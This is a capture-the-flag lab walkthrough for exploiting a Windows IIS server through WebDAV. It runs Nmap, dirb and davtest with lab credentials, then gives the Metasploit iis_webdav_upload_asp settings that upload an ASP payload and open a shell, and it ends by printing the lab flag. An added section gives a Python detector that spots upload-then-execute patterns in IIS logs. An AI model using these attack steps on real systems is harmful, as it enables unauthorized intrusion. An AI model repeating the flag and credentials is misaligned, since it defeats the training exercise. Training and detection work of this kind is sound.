
Windows IIS Server Metasploit

This document provides a reference guide for exploiting a Windows IIS server using WebDav with Metasploit. It outlines essential steps including checking the target IP, running Nmap scans, using the davtest tool for authentication, and executing the Metasploit exploit module. The final step reveals a flag after accessing the C: drive on the target system.

Uploaded by

Harlian

Name Windows: IIS Server: WebDav Metasploit

URL https://attackdefense.com/challengedetails?cid=2319

Type Windows Service Exploitation: IIS

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the “target” file.

Command: cat /root/Desktop/target

Step 2: Run an Nmap scan against the target IP.

Command: nmap 10.0.17.27


Step 3: We have discovered that multiple ports are open. We will be focusing on port 80 where
the IIS server is running.

Run the http-enum Nmap script to discover interesting directories.

Command: nmap --script http-enum -sV -p 80 10.0.17.27

We have found the webdav directory, and the request for it returned a 401 error, i.e. Unauthorized.
Note: If the http-enum script takes longer than expected, run the dirb tool to find the webdav
directory.

Command: dirb http://10.0.17.27

Step 4: Running davtest tool.

Command: davtest -url http://10.0.17.27/webdav

We can see that the /webdav path is secured with basic authentication. We have the credentials,
so access the /webdav path using the provided credentials, i.e. bob:password_123321

Command: davtest -auth bob:password_123321 -url http://10.0.17.27/webdav


The output shows that we were able to upload almost all the important file types to the /webdav
directory. It also shows that three types of files can be executed, i.e. asp, text, and html.

Step 5: Run metasploit framework and exploit the target using the IIS webdav exploit module.

Commands:
msfconsole -q
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS 10.0.17.27
set HttpUsername bob
set HttpPassword password_123321
set PATH /webdav/metasploit%RAND%.asp
exploit
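
Added example (not part of the original lab document): a detection for the condition davtest reported in Step 4, where an authenticated client can both upload into /webdav and have script files there executed. It parses IIS W3C log text and flags a client that writes via WebDAV and then gets a 2xx response for a script file in the same directory. The log lines, field order, client addresses and extension list are constructed assumptions.

```python
import re

# Constructed sample in IIS W3C extended format (not taken from the lab).
# The field order is an assumption and is read from the #Fields directive.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-01-01 10:00:01 GET /index.html - 10.10.0.5 200
2024-01-01 10:00:05 PUT /webdav/upload1.txt bob 10.10.0.9 201
2024-01-01 10:00:06 MOVE /webdav/upload1.txt bob 10.10.0.9 201
2024-01-01 10:00:07 GET /webdav/upload1.asp bob 10.10.0.9 200
2024-01-01 10:01:00 PUT /webdav/report.docx alice 10.10.0.7 201
2024-01-01 10:01:30 GET /webdav/report.docx alice 10.10.0.7 200
"""

WRITE_METHODS = {"PUT", "MOVE", "COPY"}  # WebDAV methods that create or rename files
# Extensions assumed to be mapped to server-side handlers on the IIS host.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|ashx)$", re.I)


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated lines
                yield dict(zip(fields, values))


def find_upload_then_execute(text):
    """Return (client, path) for script files written or fetched after a WebDAV write."""
    wrote = set()   # (client ip, directory) pairs with a successful write
    alerts = []
    for r in parse_w3c(text):
        stem, ok = r["cs-uri-stem"], r["sc-status"].startswith("2")
        key = (r["c-ip"], stem.rsplit("/", 1)[0].lower())
        is_script = bool(SCRIPT_EXT.search(stem))
        if r["cs-method"] in WRITE_METHODS and ok:
            wrote.add(key)
            if is_script:  # script file written directly
                alerts.append((r["c-ip"], stem))
        elif r["cs-method"] in ("GET", "POST") and ok and is_script and key in wrote:
            alerts.append((r["c-ip"], stem))
    return alerts


if __name__ == "__main__":
    for client, path in find_upload_then_execute(SAMPLE_LOG):
        print(f"ALERT upload-then-execute: {client} -> {path}")
```

The destination of a MOVE is carried in a request header that the fields above do not include, so the check correlates by client and directory rather than by exact file name.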

Step 6: Read the flag.

Check the content of the C:\ drive.

Commands:
shell
cd /
dir
type flag.txt
This reveals the flag to us.

Flag: d3aff16a801b4b7d36b4da1094bee345

References:

1. DAVTest (https://github.com/cldrn/davtest)
2. Metasploit Module (https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp/)
